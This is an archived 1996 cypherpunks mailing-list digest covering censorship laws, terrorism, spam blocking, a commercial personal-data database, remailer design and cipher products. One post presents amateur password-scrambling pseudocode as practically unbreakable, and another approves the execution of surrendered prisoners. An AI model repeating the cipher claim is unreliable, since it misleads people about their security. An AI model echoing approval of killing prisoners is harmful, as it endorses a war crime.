> > On the other hand, whether you think the people have this much right to > know or not, when the public consciousness embraces the concept that the > police openly and regularly lie (and that it's a "good thing" they do), > the result will be greater public cynicism, distrust, paranoia, hatred, > and anarchy (the bad kind). > // declan at eff.org // I do not represent the EFF // declan at well.com // From frissell at panix.com Tue Sep 10 07:15:47 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 22:15:47 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <2.2.32.19960910110046.00de3c78@panix.com> At 04:41 AM 9/9/96 -0700, Timothy C. May wrote: >Prison sentences in Germany for those who reveal forbidden information >about "the Holocaust," In a country where you get 10 months for stabbing a famous tennis star in the back, prison isn't much of a penalty. >prison terms (or worse) for dissidents in Burma, >China, and, of course, various other nations and "democratic people's >republics." > >Even here in the United States, connecting to an illegal site may mean >imprisonment. (The charge: trafficking in child pornography, for example.) The percentage of total hits that will end in jail terms or executions is meaninglessly small as a percentage of total hits, though. You must admit that a ban on 100 sites out of all the sites in the world is pretty insignificant. The swamping effects of thousands and soon millions of sites means the governments of the world won't even be able to evaluate a significant percentage even if they want to. And all this *before* we apply any of our technical fixes. DCF From frissell at panix.com Tue Sep 10 07:26:20 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 22:26:20 +0800 Subject: Terrorists Message-ID: <2.2.32.19960910110051.00dea4d0@panix.com> At 06:58 PM 9/9/96 -0700, Timothy C. 
May wrote: >Remember, folks, it is _governments_ which interfere with natural movements >of people, capital, but not birds. > >I don't want to jeopardize my reputation as a List.Racist, but I think one >of the longterm (not in the next 15 years) implications of the things we >talk about will be the increased lowering of national borders. (Yes, I have >long talked about national borders being only speed bumps...here I'm >talking about _physical_ borders.) I assume defacto open borders pretty quickly. We currently have 40 million crossings a year (mostly us and Canadians) but as people get richer that is bound to grow rapidly. Since technology causes wealth and wealthy people like to travel and governments don't like to block wealthy travelers and travelers can increase faster than border guards swamping occurs. What happens when 2000-passenger surface effect aircraft (or other new travel technologies) start showing up on the market and la migra has to deal with high volume travel. They're having trouble with current levels at JFK and Miami. They scale back. I'm not predicting de jure open borders just defacto open borders. And with those who work on the net being able to work from everywhere and nowhere, they will be able to work in countries where they do not have work authorization as easily as a novelist can today. DCF From declan at eff.org Tue Sep 10 07:45:51 1996 From: declan at eff.org (Declan McCullagh) Date: Tue, 10 Sep 1996 22:45:51 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: The revised Hatch "child porn" legislation criminalizes even *attempting* to download the forbidden data. And has two definitions of child porn that create a kind of legal buffet for prosectors' delectation. -Declan On Mon, 9 Sep 1996, Timothy C. May wrote: > Even here in the United States, connecting to an illegal site may mean > imprisonment. (The charge: trafficking in child pornography, for example.) 
> > Rather than saying such laws are "meaningless," developing blinded, > steganographic, etc. proxies may be a more useful strategy. > > --Tim May > > We got computers, we're tapping phone lines, I know that that ain't allowed. > ---------:---------:---------:---------:---------:---------:---------:---- > Timothy C. May | Crypto Anarchy: encryption, digital money, > tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero > W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, > Higher Power: 2^1,257,787-1 | black markets, collapse of governments. > "National borders aren't even speed bumps on the information superhighway." > > > > // declan at eff.org // I do not represent the EFF // declan at well.com // From asgaard at Cor.sos.sll.se Tue Sep 10 07:55:56 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Tue, 10 Sep 1996 22:55:56 +0800 Subject: Movies In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Timothy C. May wrote: > is viewed as being essentially Mexican. (Some great humor, too. And a good > murder mystery. And a love story. Conspiracy, humor, murder, love...all the > ingredients of a great story. All three major American races collide, and I think the love ingredients, all too common in movies without adding anything to the real story, are a pain in the behind. I usually channel- surf during the coitus scene (one in every movie for the last year). These things are just for wimmin. If a man wants to see love on the screen, then there is the Hard Core stuff. Asgaard From frissell at panix.com Tue Sep 10 08:00:51 1996 From: frissell at panix.com (Duncan Frissell) Date: Tue, 10 Sep 1996 23:00:51 +0800 Subject: [WAS xs4all.nl] Terrorists Message-ID: <2.2.32.19960910113535.00defde0@panix.com> At 05:54 PM 9/9/96 -0700, Timothy C. 
May wrote: >Given the mounting hysteria about terrorism (by the government, at least), >and given the various laws on the books, I would not be surprised to see >some Web sites prosecuted as "harboring" terrorists terrorist-symps. > >If any of you are not citizens of the U.S., and are here on visas, I would >give this some real serious thought. Of course, maybe deportation is a >blessing in disguise. > Course in 1951 they tried the same thing against Commies with the Smith Act. Even authorized concentration camps for 'em and everything. But it didn't work. We were still up to our asses in Commies even with the Act. They even captured the White House eventually. I don't think the anti-terrorism act will be any more effective. DCF From schmidt at pin.de Tue Sep 10 08:44:50 1996 From: schmidt at pin.de (Stephan Schmidt) Date: Tue, 10 Sep 1996 23:44:50 +0800 Subject: [WAS xs4all.nl] Terrorists (fwd) Message-ID: Stephan Schmidt wrote: > > Perhaps my connection is only disrupted accidentally, but > I can't access www.xs4all.nl from one account > (the two others still work). > IP tried : 194.109.6.100 > > SPG: What is the 'new' IP? The numbers are rotating every hour, so I can send you the ip-number every hour to trace to :) > (I hope you don't think I'm a spy for > the German Government :) Spies are not interested in ip-numbers, I think. > Perhaps this time we have to > prove that it's impossible to > block an IP/Web site, so that all govs > get a clue about how inet works. I think they have already or will be informed by the ICTF in some days. Look at: http://www.anwalt.de/ictf/_960910d.htm Also note one of the first lines: ATTENTION: This document (including all attachments) may not be quoted, placed on WWW servers, or printed until it has been completed and released. :) Henk ps. stephan, can you forward this to the list.
I'm reading this list on a server with mail2news, also as a newsgroup i cant reply to ;( From matt at nova.org Tue Sep 10 09:20:26 1996 From: matt at nova.org (Matthew Lyle) Date: Wed, 11 Sep 1996 00:20:26 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: Message-ID: On Mon, 9 Sep 1996, snow wrote: > On Fri, 6 Sep 1996 AwakenToMe at aol.com wrote: > > Tell me about it. Im on AOL. WHO CARESSSSSSS if ya get one MAYBE two pieces > > of mail you take LESS than a second to delete them both with the handy > > delete key. These people are wasting more time complaining about it than they > > will ever do actually deleting it. > > I would guess that AOL isn't doing it just because of user complaints. > AOL has millions of accounts, and spammers try to hit ALL of the addresses. > That probably (I am guessing here) doubles (or triples) the load on AOL's > already over burdened mail system. The news reports that I've read also say that, at least in the case of Cyberpromo, 75% of their email database is AOL addresses. Matt From Mullen.Patrick at mail.ndhm.gtegsc.com Tue Sep 10 13:09:42 1996 From: Mullen.Patrick at mail.ndhm.gtegsc.com (Mullen Patrick) Date: Wed, 11 Sep 1996 04:09:42 +0800 Subject: FW: RRE: Lexis-Nexis personal information database Message-ID: Okay, here's the story. The below is true, except they do NOT have your mother's maiden name. The have your name, SSN, current addy, two previous addys, and date of birth. They also have aliases, if available. Their main customers are attorneys who use this _online_ service to search for people. They've been in business for 20 years, but this list has only been run for a few months. Their customer base (I assume including all databases, which includes lists of ALL legal actions (traffic tickets??)) is 750,000. Hm. Oh, and the SSN isn't given out, but it can be used to search for someone more easily. 
So, when you do a query, all you'll get is Name, address, phone number, and date of birth, as well as two previous addresses, for what it's worth. The only thing you get that you wouldn't find out by looking in the White Pages is the DOB, and that you could make up. Another case of mass-hysteria (but, of course, *I'm* no longer on the list... ;-) BTW, they're very nice as you get taken off the computer. LONG time on hold, though... Spyjure _______________________________________________________________________________ From: E. Allen Smith on Tue, Sep 10, 1996 3:14 Subject: RRE: Lexis-Nexis personal information database To: cypherpunks at toad.com One wonders exactly how much of this information is compiled from government-generated sources? The SSN is automatically originally government-derived, of course... -Allen From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 02:02:07.36 [Excerpt from Privacy Forum 5.17.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Tue, 3 Sep 96 12:01 PDT From: privacy at vortex.com (PRIVACY Forum) Subject: PRIVACY Forum Digest V05 #17 PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17 ----------------------------------------------------------------------------- Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT) From: Larry Hunter Subject: Lexis-Nexis personal information database Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). 
This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possible other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card. As most readers will are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea. As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed. He can be reached at the above 800 number, selection option 4 and then ask for extension 3385. The information in this note has been been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper. 
Larry Hunter hunter at intr.net ------------------------------ End of PRIVACY Forum Digest 05.17 ************************ From m5 at vail.tivoli.com Tue Sep 10 13:10:05 1996 From: m5 at vail.tivoli.com (Mike McNally) Date: Wed, 11 Sep 1996 04:10:05 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: Message-ID: <3235697D.A17@vail.tivoli.com> Declan McCullagh wrote: > > The revised Hatch "child porn" legislation criminalizes even > *attempting* to download the forbidden data. What would it look like, exactly, when they went in to arrest the AltaVista search engine? ______c_________________________________________________________________ Mike M Nally * Tiv^H^H^H IBM * Austin TX * For the time being, m5 at tivoli.com * m101 at io.com * * three heads and eight arms. From cox at transarc.com Tue Sep 10 13:11:46 1996 From: cox at transarc.com (Ben Cox) Date: Wed, 11 Sep 1996 04:11:46 +0800 Subject: BoS: Can you trust your ISP ??
In-Reply-To: <2.2.32.19960910063040.006e5128@lithium> Message-ID: On Tue, 10 Sep 1996, Ben Camp wrote: > [...] Nothing anyone does on the web is > important enough to encrypt. This is an astoundingly naive statement. __ Ben Cox cox at transarc.com From roy at sendai.scytale.com Tue Sep 10 13:13:51 1996 From: roy at sendai.scytale.com (Roy M. Silvernail) Date: Wed, 11 Sep 1996 04:13:51 +0800 Subject: ALPHACIPHER - An unbreakable encryption program. In-Reply-To: <01bb9e75.fcf69000$a4dc9dcc@survival> Message-ID: <960910.071433.8A6.rnr.w165w@sendai.scytale.com> -----BEGIN PGP SIGNED MESSAGE----- In alt.security, survival at aa.net writes: [ attribution scrambled ] >> True, but somehow I have a feeling that Alphacipher is not a one-time >> pad, and thus is breakable. > > This assumption is not true. ALPHACIPHER is, indeed, based upon an OTP. > We've solved all of the problems associated with pad creation, > distribution, packaging and many other concerns that have previously > limited the use of a cipher in this class. Their web page alludes to a OTP-like operation where you have to purchase key "refills". It doesn't say where they store the escrowed copies of the key material. > Visit our net page at http://www.aa.net/cyber-survival-hq for more > information, and read the reply in response to the unfounded attack by > Curtin, posted above. I recommend this page, if only for the great conspiracy theory about automated telephone line scanning. - -- Roy M. 
Silvernail [ ] roy at scytale.com PGP Public Key fingerprint = 31 86 EC B9 DB 76 A7 54 13 0B 6A 6B CC 09 18 B6 Key available from pubkey at scytale.com -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjVcuRvikii9febJAQG1wQP+PPevphnwFiUnhwfHfi9eSLI/lJz++eaw X4Xo6Oa343rpnNoNw0D51aIRZbRmh9QRt1nhNbD3fPvNPjjvzxW58zgAtX5+kxfk b54pBzlVTEYcPBFXatfQuCjhhd95gjaMXYsKAx6rUNt02QFihGWqID48huN9nFOZ 0MlhN5IxIBk= =y4kc -----END PGP SIGNATURE----- From trei at process.com Tue Sep 10 13:41:48 1996 From: trei at process.com (Peter Trei) Date: Wed, 11 Sep 1996 04:41:48 +0800 Subject: Court challenge to AOL junk-mail blocks Message-ID: <199609101349.GAA00716@toad.com> [you can't bounce spam back to it's source] > Why not? Because spammers _invariably_ forge the return addresses to keep > exactly that from happening. What I do is look into the headers, and start bouncing it back to the domain administrator, if I can't find any better mail address. Pegasus makes it easy to automate this. I *do* send one politely worded request first - it takes a second spamming before I'll set up the rule. Peter Trei trei at process.com From fletch at ain.bls.com Tue Sep 10 14:11:02 1996 From: fletch at ain.bls.com (Mike Fletcher) Date: Wed, 11 Sep 1996 05:11:02 +0800 Subject: Guns Don't Kill People, IP Does In-Reply-To: Message-ID: <9609101437.AA06866@outland> > > > One thought : How many of you would support terrorist > > > web server (say Oklahoma, TWA, Iran, Lybia, RAF, IRA, ...) ? > > > > > > -stephan > > > > Consdering how none of the above incidents are connected in any way > > to the internet, what do you mean? And what if there were bomb making > > Sorry for my bad English, perhaps I got misunderstood. > Would you run a WWW site where the (say there where some) > terrorist who shot down (a wild assumtion too) the TWA plane > claiming it was right and all people should fight 'evil > America'. 
Because of your web site there are other bomb > attacks in the US (or somewhere else, the country is not that > important) (although it's of course impossible to proove that > this bombings are 'inspired' by your web site). > Would you support the freedom of speech in this way ? Call me crazy, but maybe if "terrorists" had a web page to use to get out their particular message they wouldn't need to go out and blow things up to get noticed (well, except for the ones in it just for the sake of blowing things up). > And to those who misunderstood my posting: > a. I support the freedom of speech. > b. I'm not shure I can support freedom of speech > in ALL circumstances. Um, which one is it. --- Fletch __`'/| fletch at ain.bls.com "Lisa, in this house we obey the \ o.O' ______ 404 713-0414(w) Laws of Thermodynamics!" H. Simpson =(___)= -| Ack. | 404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43 U ------ From js4smaug at eden.rutgers.edu Tue Sep 10 14:33:21 1996 From: js4smaug at eden.rutgers.edu (Smaug) Date: Wed, 11 Sep 1996 05:33:21 +0800 Subject: Allo allo Message-ID: Just figured i'd drop a hello in the box. Hopefully at least a few of you have encountered me at some point... For the rest, I am Si_Druid (si is for Silicon...) and i've been around too long :) I consider myself a cyBerpunk by a definition that myself and a group of other CbP's came up w/ that seemed to fit best. Whether it is best or not is a matter of much discrepancy by the hard core "CbP is a fictional genre" groupies, but its rather irrelevant to the rest of the populace. So why am i here? Well, our ideas on CbP include just about all forms of survival in this society, and cryptology is probably one of the leading forms. I figured I'd better throw my hat in the ring before it got out of hand and i wound up eating it instead. I'm not terribly experienced w/ crypts, pgp still annoys me, but 'back in the day' i used to write some low level crypts that were relatively impossible to break... 
they were also impossible to decrypt, which meant that the only way to use them was to work forward.... mostly i did password encryption schemes, this one working the best:

string         #a nice set of ascii codes
currkeyletter  #letter from string in use
password       #a password from 5 to whatever characters
encrypted      #the password encrypted
char           #the current character of the password we're playing w/
stringchar     #the char # in the string

for char=0 to lengthof(password)-1
    #getting our stringchar
    stringchar=char
    while stringchar >= lengthof(string) {
        stringchar=stringchar-lengthof(string)
    }
    currkeyletter=string[stringchar]
    #writing the encrypted password
    if char = 0   #first letter
        encrypted[char]=resolve(password[char],0,password[char+1],string[stringchar])
    else if char = lengthof(password)-1   #last letter
        encrypted[char]=resolve(password[char],encrypted[char-1],0,string[stringchar])
    else
        encrypted[char]=resolve(password[char],encrypted[char-1],password[char+1],string[stringchar])
end of for

resolve(pw,en,pw2,st){
    result=pw+en+pw2+st
    while result>=250 {
        result=result-250
    }
    return(result)
}

-----

doesn't really matter what language you write it in, the difficulty is essentially that the only way to solve it is to test all possible passwords and strings... which is... (lets say a complexity of pw=7, str=6) 52^7 * 250^6 ~=10^26

I think that was somewhere near the number of electrons in the universe :)

Anyway, just providing y'all with something to toy with....

Si.

Oh what a tangled web we weave, when we practice to deceive
Case in point - www.*.*

From jbugden at smtplink.alis.ca Tue Sep 10 14:55:50 1996
From: jbugden at smtplink.alis.ca (jbugden at smtplink.alis.ca)
Date: Wed, 11 Sep 1996 05:55:50 +0800
Subject: FW: Terrorists
Message-ID: <9608108423.AA842379241@smtplink.alis.ca>

tcmay at got.net (Timothy C. May) wrote:
>Crypto anarchy means the undermining of governments, and hence handouts to people by government.
People will only move physically for physical jobs, and not for handouts. People will flow to where the jobs are, and jobs will flow to where the people are. Isn't this what we really want? --Tim May Absolutely. I get tired of living in a small city of only 3 million. And when enough people have moved to urban areas cars will naturally become less useful because we won't have the room or the time to use them for intracity travel. Bicycle riding will then become the norm. And the weekend will be rotating with 1/7th of the population off on any given day so as to minimize the traffic loads and make better use of available resources. And power will concentrate in large organizations that will replace most of the functioning of the government. A crescendo of self organized criticality. I don't know if reference to Crazy Eddie or a growing sand pile makes a better oblique closing comment. James Got them Red China Blues... From dlv at bwalk.dm.com Tue Sep 10 15:11:54 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 06:11:54 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: Message-ID: snow writes: > On Mon, 9 Sep 1996, Timothy C. May wrote: > > > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > > in this morning. I'm sure you're busy, so I'll make this as short as > > possible. OK with you?" > > Suspicious Persons List, and there's just nothing we can do about it. We > > just can't have our corporate image linked to persons on the SPL. Now, Joe, > > you'll get a generous 6 weeks of severance pay, and Daphne will assist you > > with your outplacement processing. Of course, Joe, you will have to go > > through an inspection every morning until you're fully processed...there's > > that SPL matter, you know." > > JS: "Uh..." > > In this case I wouldn't bother with Mr. Bell's solution. This reminds me of a real story when an h.r. person walked in on some bank employee and told her than she was being laid off. 
"And by the way the no-fee bank account you had as an employee is closed, so here's an application you have to feel for a regular account with us." He got injured. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dthorn at gte.net Tue Sep 10 15:23:02 1996 From: dthorn at gte.net (Dale Thorn) Date: Wed, 11 Sep 1996 06:23:02 +0800 Subject: Test...sorry about this - Reply In-Reply-To: Message-ID: <3234DD65.7B44@gte.net> Barbara Gamble wrote: > I got it too. And since I am a new subscriber, I thought it might be > the normal traffic. The Welcome msg *did* say the list is high- > traffic. Still, I was aghast--300 all at once, another 100 just in > the last hour. Is that typical? (Please forgive such a question from a > newcomer to the list.) > Z.B. 09/06 10:38 am > I'm just posting this to see if there's something wrong with my mail > filter - it dumped a ton of messages from this list over the night, > > and I'm trying to figure out why the !@%$# it did that. Sorry for the > interruption. > Zach Babayco > zachb at netcom.com <----- finger for PGP public key > http://www.geocities.com/SiliconValley/Park/4127 If this is any help, I've been on this forum (and on the WWW total) for 11 days now, and messages have averaged 4 per hour, 96 per day. But this only counts cypherpunks at toad.com. If you get email from several forums simultaneously, it might be a lot more. From tcmay at got.net Tue Sep 10 15:25:08 1996 From: tcmay at got.net (Timothy C. May) Date: Wed, 11 Sep 1996 06:25:08 +0800 Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati Message-ID: At 12:41 PM 9/10/96, Enzo Michelangeli wrote: >> As to what I presume is an insult to the folks on this list ("I'm >> personally not interested in conjuring up the latest utopia for a >> minoritarian sect of illuminati"), you know where the exit is. > >Triple cheers for free speech. 
Calling for expulsion of those who don't >share your opinion seems to me the clearest sign of will to remain an >enlightened minority. Then, why do you take it as an insult? I didn't call for your "expulsion." No one has been expelled in four years of the list's existence. However, when people complain about not being interested in the list topics, and refers to some of the main list topics as "conjuring up the latest utopia for a minoritarian sect of illuminati," then, yes, I would say this is insulting, or, at least, dismissive. As with a restaurant, if people complain loudly about the food, they ought to leave and not come back. This is not the restaurant expelling them, this is just them acting on their opinions. --Tim May, Member of the Minoritarian Illuminati We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From netsurf at pixi.com Tue Sep 10 15:25:41 1996 From: netsurf at pixi.com (NetSurfer) Date: Wed, 11 Sep 1996 06:25:41 +0800 Subject: Court challenge to AOL junk-mail blocks In-Reply-To: <1.5.4.32.19960909182501.00685618@pop3.interramp.com> Message-ID: On Mon, 9 Sep 1996, Will Rodger wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > Why not? Because spammers _invariably_ forge the return addresses to keep > exactly that from happening. Indeed, Cyber Promo claims it "had an And then there are the network headers - you can usually see where the msg entered the net. These people aren't usually clever enough to spoof the headers beyond the from and reply to fields. 
From afabbro at umich.edu Tue Sep 10 15:36:51 1996
From: afabbro at umich.edu (Andrew Fabbro)
Date: Wed, 11 Sep 1996 06:36:51 +0800
Subject: LEOs running anon servers?
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 9 Sep 1996, Dr.Dimitri Vulis KOTM wrote:

> There
> are a number of anonymous remailers out in cyberspace, but it has been
> stated by a knowledgeable source that a number of them are being operated
> by law enforcement agencies (presumably to troll for criminal activity). A

Can someone verify/discredit/comment on this statement? Who is the knowledgeable source?

Andrew Fabbro [afabbro at umich.edu]
http://www-personal.umich.edu/~afabbro/
PGP mail preferred; finger afabbro at us.itd.umich.edu for key
"A good marketing organization listens to its customers...WE HEAR YOU!" - the National Security Agency

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.0

iQCVAwUBMjWOx7oWkgjb6N6dAQEK4QP9ETvg03QMpYw81FmXNl0vxbkYLk9wph74
/291PduW3+BkN17iKBBns6v//HrnZJIttMqG+7wLzrX+zt1OpspGJLjJm03P/m68
CQ8L2K3stOyYvSB/S63M449eC+QX9iNEFpLD/QNOv7JM4ZVgQvEvUH6STaxF+Ez4
ClypqKualSA=
=L3rM
-----END PGP SIGNATURE-----

From enzo at ima.com Tue Sep 10 15:45:17 1996
From: enzo at ima.com (Enzo Michelangeli)
Date: Wed, 11 Sep 1996 06:45:17 +0800
Subject: Conjuring up the latest utopia for a minoritarian sect of illuminati
In-Reply-To:
Message-ID:

On Mon, 9 Sep 1996, Timothy C. May wrote:

> At 10:04 AM 9/9/96, Enzo Michelangeli wrote:
>
> >I and you may well choose to do so, but the vast majority of the human
> >beings believe just anything that is repeated loud and long enough.
> >Otherwise, nobody would hire PR and pay for advertisement, politicians > >wouln't be fedwith taxpayer's money, Bosnians would trade goods instead > >of gunshots, etc. I'm personally not interested in conjuring up the latest > >utopia for a minoritarian sect of illuminati: I need to live in the real > >world, and push for viable solutions that change it for better, now. > > Yes, Bosnians and Serbs would not be killing each other if only they could > receive government-approved information! In fact, their governments were the chief repeaters of things loud and long enough, and were believed. > (Hint: This shows that neither governments nor churches nor the United > Nations knows any better solutions to the "who do you trust" problem. And, > I believe, mostly governments and other such entities exist to serve their > own interests.) Can you please quote a sentence of mine where I have denied that? > As to what I presume is an insult to the folks on this list ("I'm > personally not interested in conjuring up the latest utopia for a > minoritarian sect of illuminati"), you know where the exit is. Triple cheers for free speech. Calling for expulsion of those who don't share your opinion seems to me the clearest sign of will to remain an enlightened minority. Then, why do you take it as an insult? Enzo From tbyfield at panix.com Tue Sep 10 15:50:13 1996 From: tbyfield at panix.com (t byfield) Date: Wed, 11 Sep 1996 06:50:13 +0800 Subject: TWA 800 - hit by an unarmed US missile? In-Reply-To: <199609091638.MAA19400@mail2.panix.com> Message-ID: At 6:05 PM -0500 on 9/9/96, Vince Cate wrote: > > vince at offshore.com.ai (Vincent Cate): > > > If the Navy was firing missiles in this area, it really does seem >like the > > > press should be checking out this angle. > > > > What makes you think they aren't? > > Not saying they aren't; however, I don't recall seeing CNN or any of the > networks saying if the Navy really was firing missiles or not. Have they? 
> Never seen anyone ask questions about US firing missiles (have seen them > ask if it was a missile or a bomb). I don't get any US newspapers here in > Anguilla, so my impression of the US press is really just from TV. > > Is the press on top of this? Some good friends (Satanic Mainstream Reporters) who are working on the case have certainly _said_ they were looking into it; of course, maybe [your favorite conspiracy here] bought them out/blackmailed them/planted a microchip in their bum/Stepfordized them/[your favorite subversion method here]. Given (a) the intense competition among reporters and (b) the near-impossibility of keeping secret something known by 1/2/3+ people, I somehow kind of doubt the plane was shot down by a US ship--as one friend put it, they'd have to sink the entire ship to keep it a secret, but it'd be hard to keep it a secret why they sunk the ship, etc., etc. And, frankly, I doubt the FBI/NTSB/et al. really know what happened. Though I doubt they'd keep on mentioning the missile theory without _very_ good reason to believe it's likely. /t From dlv at bwalk.dm.com Tue Sep 10 15:56:36 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 11 Sep 1996 06:56:36 +0800 Subject: China joins Singapore, Germany, .... In-Reply-To: <2.2.32.19960910110046.00de3c78@panix.com> Message-ID: Duncan Frissell writes: > At 04:41 AM 9/9/96 -0700, Timothy C. May wrote: > > >Prison sentences in Germany for those who reveal forbidden information > >about "the Holocaust," > > In a country where you get 10 months for stabbing a famous tennis star in > the back, prison isn't much of a penalty. I'm sure the sentense would have been different if she weren't a Slavic untermensch, or if he were, say, a Turk. A friend of mine related how his father - a Jew and a Soviet Army officer - commanded a company in WW2. In 1944 they came across a church where over a thousand Nazi soldiers surrendered without reistance. 
He announced them "Ich bin ain Jude" and had them all executed. I think he did the right thing. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From jimbell at pacifier.com Tue Sep 10 16:05:29 1996 From: jimbell at pacifier.com (jim bell) Date: Wed, 11 Sep 1996 07:05:29 +0800 Subject: China joins Singapore, Germany, .... Message-ID: <199609101626.JAA19796@mail.pacifier.com> At 08:13 AM 9/10/96 -0500, Mike McNally wrote: >Declan McCullagh wrote: >> >> The revised Hatch "child porn" legislation criminalizes even >> *attempting* to download the forbidden data. > >What would it look like, exactly, when they went in to arrest the >AltaVista search engine? "Drop those bits! We've got you delimited!" Jim Bell jimbell at pacifier.com From jya at pipeline.com Tue Sep 10 16:11:03 1996 From: jya at pipeline.com (John Young) Date: Wed, 11 Sep 1996 07:11:03 +0800 Subject: Ban CU Secrecy, Keep TLA's! Message-ID: <199609101626.QAA19815@pipe1.t2.usa.pipeline.com> FiTi, 10 September 1996. Call to abolish banking secrecy By William Lewis in Cambridge The UK government should take a lead and abolish banking secrecy in its dependent territory offshore centres, a former legal adviser to MI5 and MI6, the British intelligence agencies, said yesterday. Mr David Bickford, the first British intelligence lawyer to speak publicly in the UK, said at a conference in Cambridge, 50 miles north-east of London, that there "appears to be no justification at all for offshore bank secrecy other than to protect the criminal". He said "offshore bank secrecy can and must be abolished" and "the UK should be the first to abolish this secrecy given their control of their dependent territory offshore centres". Mr Bickford, who now runs an international legal consultancy, said "endemic corruption" is caused by offshore secrecy, and it is "difficult to see why it is tolerated by any other than those with an unlawful disposition". 
He said allowing countries to maintain offshore banking secrecy is "a classic example of the corruptive influence of organised crime". Mr Bickford added that the "justification is put forward at all is an example of the overwhelming subversive corruptive influence of organised crime which has managed to magic a seemingly acceptable position out of the sheer weight of its financial proceeds from narcotics, fraud, extortion and other criminal enterprise". Mr Raymond Kendall, secretary general of Interpol told the 14th International Symposium on Economic Crime that governments should commit more resources and step up co-operation to tackle the growing problem of international corruption. [End] From mech at eff.org Tue Sep 10 16:12:04 1996 From: mech at eff.org (Stanton McCandlish) Date: Wed, 11 Sep 1996 07:12:04 +0800 Subject: EFF & Penet Message-ID: <199609101924.MAA29487@eff.org> FYI: EFF is in contact with Julf, and helping him on an informal basis to examine his legal and media options for setting the record straight in re: the Observer attack on his and anon.penet.fi's character. (Most details are attorney-client priviledged, thus the brevity of this note.) -- Stanton McCandlish


mech at eff.org
Electronic Frontier Foundation
Online Activist

From andrew_loewenstern at il.us.swissbank.com Tue Sep 10 16:14:13 1996
From: andrew_loewenstern at il.us.swissbank.com (Andrew Loewenstern)
Date: Wed, 11 Sep 1996 07:14:13 +0800
Subject: strengthening remailer protocols
In-Reply-To:
Message-ID: <9609101751.AA00594@ch1d157nwk>

Wei Dai writes:
> How about a combination of the two? Suppose Alice wants to
> anonymously post a message and get replies. She generates a
> new RSA key, signs her post with it, and asks readers to send
> encrypted replies to a server. Then periodically she sends a
> one-time reply block to the server to retrieve the accumulated
> replies.

I'd like to chime in and say that this is a really good idea. Basically a nymserver that holds onto incoming mail until an e-mail arrives from the nym to retrieve it.

How would mixmaster be able to support one-time reply blocks? If the nym's mailbox is larger than the mixmaster message size (pretty likely) and needs to be split up, then more than one reply-block is going to be required. Should the nym generate a big stack of reply-blocks/routing headers and send them in with the retrieval request? I suppose the server could fill up as many mixmaster message parts as it had blocks, then append something like "15 more messages waiting (32,082 bytes - Two More Reply Blocks Required)" and ship it off.

Reliability is a problem with remailers... what happens now if a remailer in your reply block goes out and you receive mail at your nym account? Does it just disappear? With this system you could have a simple ACK protocol to ensure reliable delivery of the mail. A magic cookie would be appended to your retrieved mail, which the server would then hold onto (it would still count against your quota...). The mail would be deleted once you sent back an ACK with the magic cookie.

Here is yet another good application for DigiCash. The operator could offer free accounts with very small mailbox quotas, or charge for bigger accounts.
